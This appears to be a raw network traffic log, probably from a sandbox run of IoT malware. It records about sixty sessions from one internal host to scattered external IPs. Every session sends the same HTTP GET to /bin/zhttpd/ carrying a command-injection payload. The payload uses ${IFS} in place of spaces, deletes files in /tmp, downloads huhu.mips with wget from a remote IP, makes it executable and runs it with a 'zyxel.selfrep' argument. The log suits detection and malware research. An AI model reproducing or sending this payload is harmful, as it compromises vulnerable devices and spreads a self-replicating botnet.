                                                Jan 29, 2024 07:07:37.077075005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1500192.168.2.235651244.136.39.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.077125072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1501192.168.2.2360638198.162.193.9443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.077153921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1502192.168.2.235744024.185.37.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.077208042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1503192.168.2.2359140153.138.137.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.077254057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1504192.168.2.2355540128.219.8.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.077302933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1505192.168.2.2358490143.227.44.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.077333927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1506192.168.2.234676666.161.11.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.077382088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1507192.168.2.2335250193.184.215.74443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.077431917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1508192.168.2.233676697.92.126.171443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.077476978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1509192.168.2.2359654222.233.57.123443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.077476978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1510192.168.2.235775279.236.39.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.077538967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1511192.168.2.2343580170.150.210.1443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.077590942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1512192.168.2.2345094186.226.194.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.077632904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1513192.168.2.233700674.219.252.129443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.077673912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1514192.168.2.2343508156.11.114.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.077719927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1515192.168.2.235285242.112.251.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.077744961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1516192.168.2.2340908154.147.103.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.077792883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1517192.168.2.235485258.40.5.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.077822924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1518192.168.2.2357508125.203.3.228443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.077846050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1519192.168.2.2346536166.100.247.221443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.077899933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1520192.168.2.233511052.131.201.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.077958107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1521192.168.2.2338788176.5.30.179443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.077986002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1522192.168.2.2347524204.90.229.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.078001022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1523192.168.2.23334149.13.166.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.078054905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1524192.168.2.2360750197.14.131.226443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.078100920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1525192.168.2.2336286108.25.125.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.078126907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1526192.168.2.235909873.135.94.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.078162909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1527192.168.2.2333548104.127.144.16443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.078221083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1528192.168.2.2357754196.6.10.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.078238964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1529192.168.2.235490453.153.59.242443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.078280926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1530192.168.2.2338454135.107.100.234443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.078315973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1531192.168.2.2334118210.225.41.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.078358889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1532192.168.2.2343416193.172.155.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.078392982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1533192.168.2.235007676.103.100.100443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.078449965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1534192.168.2.235488093.168.120.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.078484058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1535192.168.2.2350994157.68.123.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.078514099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1536192.168.2.235710886.188.195.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.078571081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1537192.168.2.2359206138.98.244.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.078613043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1538192.168.2.2349668160.123.154.106443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.078629971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1539192.168.2.2344356147.163.6.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.078691006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1540192.168.2.2341382185.109.70.115443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.078715086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1541192.168.2.234487693.15.193.150443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.078759909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1542192.168.2.235174086.120.145.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.078810930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1543192.168.2.2345960168.240.204.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.078849077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1544192.168.2.2356784186.150.163.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.078900099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1545192.168.2.234459435.4.39.224443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.078927994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1546192.168.2.233639664.231.68.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.078968048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1547192.168.2.235385487.232.111.66443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.079018116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1548192.168.2.233749672.41.211.84443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.079063892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1549192.168.2.2339632132.169.126.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.079092979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1550192.168.2.2351120221.49.249.148443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.079123974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1551192.168.2.2340842191.45.246.123443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.079190016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1552192.168.2.234182093.53.242.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.079219103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1553192.168.2.23582684.122.56.178443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.079241991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1554192.168.2.235010453.48.244.142443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.079268932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1555192.168.2.2358036164.152.211.166443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.079308033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1556192.168.2.2337410102.255.185.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.079365015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1557192.168.2.233796636.223.111.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.079410076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1558192.168.2.235613064.75.155.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.079461098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1559192.168.2.2336134109.153.149.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.079483986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1560192.168.2.2355970178.187.105.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.079543114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1561192.168.2.233540237.34.255.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.079576015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1562192.168.2.2356970205.216.31.95443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:37.079607010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1563192.168.2.2338052153.21.182.121443
                                                TimestampBytes transferredDirectionData
